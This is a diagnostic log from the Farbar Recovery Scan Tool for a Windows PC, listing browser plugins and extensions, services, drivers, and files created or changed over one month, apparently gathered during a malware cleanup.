Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 167.206.245.135 167.206.245.136

FireFox:
========
FF ProfilePath: C:\Users\anonymous\AppData\Roaming\Mozilla\Firefox\Profiles\1j94e34f.default-1417893552894
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_246.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_246.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Audiovisual & Graphics\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll (Citrix Systems, Inc.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.2 -> C:\Audiovisual & Graphics\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Audiovisual & Graphics\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Security\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Security\Avast\WebRep\FF [2012-06-30]
FF HKLM-x32\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF Extension: HP Smart Web Printing - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2013-08-24]
FF HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...\Firefox\Extensions: [webmaster@OpenCloner.com] - C:\Audiovisual & Graphics\Stream Cloner\INSTALLED SC\Stream-Cloner\FireFox
FF Extension: Stream-Cloner launch tool - C:\Audiovisual & Graphics\Stream Cloner\INSTALLED SC\Stream-Cloner\FireFox [2013-12-15]
FF HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...\Firefox\Extensions: [{B64D9B05-48E1-4CEB-BF58-E0643994E900}] - C:\Program Files (x86)\Common Files\DVDVideoSoft\plugins\ff

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Security\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-11-28]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.)
R2 AdobeActiveFileMonitor10.0; C:\Audiovisual & Graphics\Photoshop Elements 10\Adobe Photoshop Elements 10\PSE 10\INSTALLED\Elements 10 Organizer\PhotoshopElementsFileAgent.exe [169624 2011-09-14] (Adobe Systems Incorporated)
R2 AtherosSvc; C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\adminservice.exe [106144 2011-12-29] (Atheros Commnucations) [File not signed]
R2 avast! Antivirus; C:\Security\Avast\AvastSvc.exe [50344 2014-11-28] (AVAST Software)
R3 AvastVBoxSvc; C:\Security\Avast\ng\vbox\AvastVBoxSVC.exe [4012248 2014-11-28] (Avast Software)
S2 DellDigitalDelivery; c:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe [162816 2011-10-26] (Dell Products, LP.) [File not signed]
R2 Garmin Core Update Service; C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe [438616 2014-08-07] (Garmin Ltd or its subsidiaries)
R3 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [248832 2009-05-21] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll [133120 2009-05-21] (Hewlett-Packard Co.) [File not signed]
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [128280 2012-01-21] ()
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
R2 ZAtheros Bt&Wlan Coex Agent; C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Ath_CoexAgent.exe [158880 2011-12-29] (Atheros) [File not signed]
R2 ZAtheros Wlan Agent; C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [76960 2011-12-26] (Atheros) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29208 2014-11-28] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [83280 2014-11-28] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93568 2014-11-28] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65776 2014-11-28] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1050432 2014-11-28] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [436624 2014-11-28] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [116728 2014-11-28] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [267632 2014-11-28] ()
S3 pmxdrv; C:\Windows\system32\drivers\pmxdrv.sys [31152 2012-11-02] ()
S3 Serial; C:\Windows\system32\drivers\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)
R2 VBoxAswDrv; C:\Security\Avast\ng\vbox\VBoxAswDrv.sys [271752 2014-11-28] (Avast Software)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-02 15:45 - 2015-01-02 15:45 - 00028696 _____ () C:\Users\anonymous\Desktop\FRST.txt
2015-01-02 15:44 - 2015-01-02 15:45 - 00000000 ____D () C:\FRST
2015-01-02 15:44 - 2015-01-02 15:44 - 00005252 _____ () C:\Windows\WindowsUpdate.log
2015-01-02 15:44 - 2014-12-28 08:49 - 02122752 _____ (Farbar) C:\Users\anonymous\Desktop\FRST64.exe
2015-01-02 15:43 - 2015-01-02 15:43 - 00000155 _____ () C:\Windows\system32\2015-01-02-20-43-11.042-AvastVBoxSVC.exe-8972.log
2015-01-02 15:41 - 2015-01-02 15:41 - 00354232 _____ () C:\Windows\system32\FNTCACHE.DAT
2015-01-02 15:41 - 2015-01-02 15:41 - 00090368 _____ () C:\Users\anonymous\AppData\Local\GDIPFONTCACHEV1.DAT
2015-01-02 15:41 - 2015-01-02 15:41 - 00000056 _____ () C:\Windows\setupact.log
2015-01-02 15:41 - 2015-01-02 15:41 - 00000000 ___RD () C:\Users\anonymous\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
2015-01-02 15:41 - 2015-01-02 15:41 - 00000000 _____ () C:\Windows\setuperr.log
2014-12-30 17:14 - 2014-12-30 17:15 - 00000155 _____ () C:\Windows\system32\2014-12-30-22-14-51.015-AvastVBoxSVC.exe-4864.log
2014-12-28 12:19 - 2014-12-28 12:19 - 00000155 _____ () C:\Windows\system32\2014-12-28-17-19-20.069-AvastVBoxSVC.exe-4152.log
2014-12-28 09:26 - 2014-12-28 09:26 - 00000155 _____ () C:\Windows\system32\2014-12-28-14-26-14.010-AvastVBoxSVC.exe-4132.log
2014-12-28 08:56 - 2014-12-28 08:52 - 00688992 ____R (Swearware) C:\Users\anonymous\Desktop\dds.com
2014-12-28 08:07 - 2014-12-28 08:07 - 00000155 _____ () C:\Windows\system32\2014-12-28-13-07-21.019-AvastVBoxSVC.exe-4280.log
2014-12-28 05:55 - 2014-12-28 05:56 - 00000155 _____ () C:\Windows\system32\2014-12-28-10-55-57.042-AvastVBoxSVC.exe-4184.log
2014-12-28 05:38 - 2014-12-28 08:59 - 00000000 ____D () C:\Users\anonymous\Desktop\PROBLEM
2014-12-28 05:13 - 2014-12-28 05:14 - 00000155 _____ () C:\Windows\system32\2014-12-28-10-13-51.004-AvastVBoxSVC.exe-4260.log
2014-12-28 05:06 - 2014-12-28 05:06 - 00000155 _____ () C:\Windows\system32\2014-12-28-10-06-44.012-AvastVBoxSVC.exe-4712.log
2014-12-28 04:36 - 2014-12-28 04:44 - 00024064 ____H () C:\Users\anonymous\Desktop\~WRL0001.tmp
2014-12-28 04:36 - 2014-12-28 04:36 - 00001153 _____ () C:\Users\anonymous\Desktop\Mozilla Firefox.lnk
2014-12-28 04:35 - 2014-12-28 04:36 - 00000155 _____ () C:\Windows\system32\2014-12-28-09-35-50.013-AvastVBoxSVC.exe-4880.log
2014-12-27 22:11 - 2014-12-27 22:11 - 00000155 _____ () C:\Windows\system32\2014-12-28-03-11-11.081-AvastVBoxSVC.exe-4148.log
2014-12-27 19:44 - 2014-12-27 19:44 - 00000155 ____N () C:\Windows\system32\2014-12-28-00-44-03.041-AvastVBoxSVC.exe-7120.log
2014-12-27 19:04 - 2014-12-27 19:04 - 00000155 ____N () C:\Windows\system32\2014-12-28-00-04-48.054-AvastVBoxSVC.exe-5012.log
2014-12-27 18:56 - 2014-12-27 18:57 - 00000155 ____N () C:\Windows\system32\2014-12-27-23-56-52.003-AvastVBoxSVC.exe-4612.log
2014-12-27 18:40 - 2014-12-27 18:40 - 00000155 ____N () C:\Windows\system32\2014-12-27-23-40-03.038-AvastVBoxSVC.exe-5852.log
2014-12-27 18:31 - 2014-12-27 18:32 - 00000155 ____N () C:\Windows\system32\2014-12-27-23-31-48.033-AvastVBoxSVC.exe-4956.log
2014-12-27 18:01 - 2014-12-27 18:01 - 00000240 ____N () C:\Users\anonymous\Desktop\5FU.txt
2014-12-17 13:31 - 2014-12-13 00:09 - 00144384 ____N (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-12-17 13:31 - 2014-12-12 22:33 - 00115712 ____N (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-12-12 03:18 - 2014-12-12 03:18 - 00000155 ____N () C:\Windows\system32\2014-12-12-08-18-54.004-AvastVBoxSVC.exe-4304.log
2014-12-11 03:23 - 2014-12-11 03:23 - 00000155 ____N () C:\Windows\system32\2014-12-11-08-23-20.065-AvastVBoxSVC.exe-4148.log
2014-12-11 03:20 - 2014-12-11 03:20 - 00000000 ____D () C:\Windows\system32\appraiser
2014-12-11 03:01 - 2014-10-17 21:05 - 04121600 ____N (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-12-11 03:01 - 2014-10-17 20:33 - 03209728 ____N (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-12-10 06:19 - 2014-12-03 21:50 - 00830976 ____N (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2014-12-10 06:19 - 2014-12-03 21:50 - 00741376 ____N (Microsoft Corporation) C:\Windows\system32\invagent.dll
2014-12-10 06:19 - 2014-12-03 21:50 - 00413184 ____N (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-12-10 06:19 - 2014-12-03 21:50 - 00396800 ____N (Microsoft Corporation) C:\Windows\system32\devinv.dll
2014-12-10 06:19 - 2014-12-03 21:50 - 00227328 ____N (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-12-10 06:19 - 2014-12-03 21:50 - 00192000 ____N (Microsoft Corporation) C:\Windows\system32\aepic.dll
2014-12-10 06:19 - 2014-12-03 21:44 - 01083392 ____N (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-12-10 06:19 - 2014-12-01 18:28 - 01232040 ____N (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2014-12-10 06:18 - 2014-11-26 20:43 - 00389296 ____N (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-12-10 06:18 - 2014-11-26 20:10 - 00342200 ____N (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-12-10 06:18 - 2014-11-21 22:13 - 25059840 ____N (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-12-10 06:18 - 2014-11-21 22:06 - 02724864 ____N (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-12-10 06:18 - 2014-11-21 22:06 - 00004096 ____N (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-12-10 06:18 - 2014-11-21 21:50 - 00580096 ____N (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-12-10 06:18 - 2014-11-21 21:50 - 00066560 ____N (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-12-10 06:18 - 2014-11-21 21:49 - 02885120 ____N (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-12-10 06:18 - 2014-11-21 21:49 - 00048640 ____N (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-12-10 06:18 - 2014-11-21 21:48 - 00088064 ____N (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-12-10 06:18 - 2014-11-21 21:41 - 00054784 ____N (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-12-10 06:18 - 2014-11-21 21:40 - 00034304 ____N (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-12-10 06:18 - 2014-11-21 21:37 - 00633856 ____N (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-12-10 06:18 - 2014-11-21 21:35 - 00114688 ____N (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-12-10 06:18 - 2014-11-21 21:34 - 06039552 ____N (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-12-10 06:18 - 2014-11-21 21:34 - 00814080 ____N (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-12-10 06:18 - 2014-11-21 21:26 - 00968704 ____N (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-12-10 06:18 - 2014-11-21 21:22 - 19749376 ____N (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-12-10 06:18 - 2014-11-21 21:22 - 00490496 ____N (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-12-10 06:18 - 2014-11-21 21:20 - 02724864 ____N (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-12-10 06:18 - 2014-11-21 21:14 - 00077824 ____N (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-12-10 06:18 - 2014-11-21 21:09 - 00199680 ____N (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-12-10 06:18 - 2014-11-21 21:08 - 00092160 ____N (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-12-10 06:18 - 2014-11-21 21:07 - 00501248 ____N (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-12-10 06:18 - 2014-11-21 21:07 - 00062464 ____N (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-12-10 06:18 - 2014-11-21 21:06 - 00047616 ____N (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-12-10 06:18 - 2014-11-21 21:05 - 00316928 ____N (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-12-10 06:18 - 2014-11-21 21:05 - 00064000 ____N (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-12-10 06:18 - 2014-11-21 21:01 - 02277888 ____N (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-12-10 06:18 - 2014-11-21 20:59 - 00047104 ____N (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-12-10 06:18 - 2014-11-21 20:58 - 00030720 ____N (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-12-10 06:18 - 2014-11-21 20:56 - 00478208 ____N (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-12-10 06:18 - 2014-11-21 20:54 - 00620032 ____N (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-12-10 06:18 - 2014-11-21 20:49 - 00800768 ____N (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-12-10 06:18 - 2014-11-21 20:49 - 00718848 ____N (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-12-10 06:18 - 2014-11-21 20:47 - 01359360 ____N (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-12-10 06:18 - 2014-11-21 20:46 - 02125312 ____N (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-12-10 06:18 - 2014-11-21 20:45 - 00418304 ____N (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-12-10 06:18 - 2014-11-21 20:43 - 14412800 ____N (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-12-10 06:18 - 2014-11-21 20:40 - 00060416 ____N (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-12-10 06:18 - 2014-11-21 20:36 - 00168960 ____N (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-12-10 06:18 - 2014-11-21 20:35 - 00076288 ____N (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-12-10 06:18 - 2014-11-21 20:33 - 00285696 ____N (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-12-10 06:18 - 2014-11-21 20:29 - 04299264 ____N (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-12-10 06:18 - 2014-11-21 20:28 - 02358272 ____N (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-12-10 06:18 - 2014-11-21 20:23 - 00688640 ____N (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-12-10 06:18 - 2014-11-21 20:22 - 02052096 ____N (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-12-10 06:18 - 2014-11-21 20:21 - 01155072 ____N (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-12-10 06:18 - 2014-11-21 20:15 - 01548288 ____N (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-12-10 06:18 - 2014-11-21 20:13 - 12836864 ____N (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-12-10 06:18 - 2014-11-21 20:03 - 00800768 ____N (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-12-10 06:18 - 2014-11-21 20:00 - 01888256 ____N (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-12-10 06:18 - 2014-11-21 19:56 - 01307136 ____N (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-12-10 06:18 - 2014-11-21 19:54 - 00710144 ____N (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-12-10 06:18 - 2014-11-10 22:09 - 01424384 ____N (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2014-12-10 06:18 - 2014-11-10 21:44 - 01230336 ____N (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2014-12-10 06:18 - 2014-11-10 20:46 - 00119296 ____N (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2014-12-10 06:14 - 2014-11-07 22:16 - 00002048 ____N (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-12-10 06:14 - 2014-11-07 21:45 - 00002048 ____N (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-12-10 06:14 - 2014-10-29 21:03 - 00165888 ____N (Microsoft Corporation) C:\Windows\system32\charmap.exe
2014-12-10 06:14 - 2014-10-29 20:45 - 00155136 ____N (Microsoft Corporation) C:\Windows\SysWOW64\charmap.exe
2014-12-10 06:14 - 2014-10-02 21:12 - 02020352 ____N (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2014-12-10 06:14 - 2014-10-02 21:12 - 00346624 ____N (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2014-12-10 06:14 - 2014-10-02 21:12 - 00310272 ____N (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2014-12-10 06:14 - 2014-10-02 21:12 - 00181248 ____N (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2014-12-10 06:14 - 2014-10-02 21:11 - 00266240 ____N (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2014-12-10 06:14 - 2014-10-02 20:45 - 01177088 ____N (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2014-12-10 06:14 - 2014-10-02 20:45 - 00248832 ____N (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll
2014-12-10 06:14 - 2014-10-02 20:45 - 00214016 ____N (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2014-12-10 06:14 - 2014-10-02 20:45 - 00145920 ____N (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2014-12-10 06:14 - 2014-10-02 20:44 - 00198656 ____N (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe
2014-12-10 04:43 - 2014-12-10 04:43 - 00450776 ____R () C:\Windows\system32\Drivers\etc\hosts.20141210-044312.backup
2014-12-06 16:01 - 2014-12-06 16:01 - 00000000 ____D () C:\Users\anonymous\AppData\Roaming\PCDr
2014-12-06 16:01 - 2014-12-06 16:01 - 00000000 ____D () C:\ProgramData\PCDr
2014-12-06 15:12 - 2014-12-06 15:11 - 00000993 ____N () C:\Users\anonymous\Desktop\Malwarebytes Anti-Malware.lnk
2014-12-06 14:30 - 2014-12-06 14:35 - 00000000 ____D () C:\AdwCleaner
2014-12-06 14:30 - 2014-12-06 14:34 - 00000110 ____N () C:\AdwCleanerDebug.txt
2014-12-06 14:10 - 2014-12-06 14:10 - 00000155 ____N () C:\Windows\system32\2014-12-06-19-10-09.012-AvastVBoxSVC.exe-7476.log
2014-12-05 17:48 - 2014-12-20 14:12 - 00000000 ____D () C:\photos - digital 7
2014-12-03 19:05 - 2014-12-03 19:05 - 00000155 ____N () C:\Windows\system32\2014-12-04-00-05-28.001-AvastVBoxSVC.exe-1800.log
2014-12-03 18:55 - 2014-12-03 18:55 - 00000155 ____N () C:\Windows\system32\2014-12-03-23-55-08.006-AvastVBoxSVC.exe-6684.log

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-02 15:42 - 2013-12-14 17:41 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-01-02 15:42 - 2012-06-28 07:53 - 00000000 ____D () C:\Users\Default\AppData\Local\SoftThinks
2015-01-02 15:42 - 2012-06-28 07:53 - 00000000 ____D () C:\Users\Default User\AppData\Local\SoftThinks
2015-01-02 15:42 - 2012-06-28 07:50 - 00000000 ____D () C:\Program Files (x86)\Dell DataSafe Local Backup
2015-01-02 15:41 - 2014-08-16 01:00 - 00000000 ____D () C:\Users\anonymous\AppData\Local\Adobe
2015-01-02 15:41 - 2012-06-28 07:45 - 00000828 _____ () C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job
2015-01-02 15:41 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-12-30 17:32 - 2012-08-31 03:09 - 00000000 ____D () C:\Users\anonymous\AppData\Local\CrashDumps
2014-12-30 17:32 - 2012-07-03 18:53 - 00000000 ____D () C:\Windows\Minidump
2014-12-30 17:32 - 2012-07-01 13:26 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-12-30 17:31 - 2013-07-24 16:42 - 00000981 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-12-30 17:23 - 2009-07-14 00:13 - 00782470 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-12-30 17:21 - 2014-08-18 03:30 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-12-30 17:13 - 2012-06-30 14:48 - 00000000 ____D () C:\Users\anonymous
2014-12-30 04:27 - 2013-12-14 17:41 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-12-30 04:08 - 2012-07-07 13:46 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-12-29 22:00 - 2012-09-23 14:37 - 00000508 _____ () C:\Windows\Tasks\GBM - New Backup Job-Incremental.job
2014-12-29 13:53 - 2012-06-28 07:45 - 00000830 _____ () C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job
2014-12-28 22:00 - 2012-09-23 14:37 - 00000508 _____ () C:\Windows\Tasks\GBM - New Backup Job-Full.job
2014-12-28 12:26 - 2009-07-13 23:45 - 00028352 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-12-28 12:26 - 2009-07-13 23:45 - 00028352 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
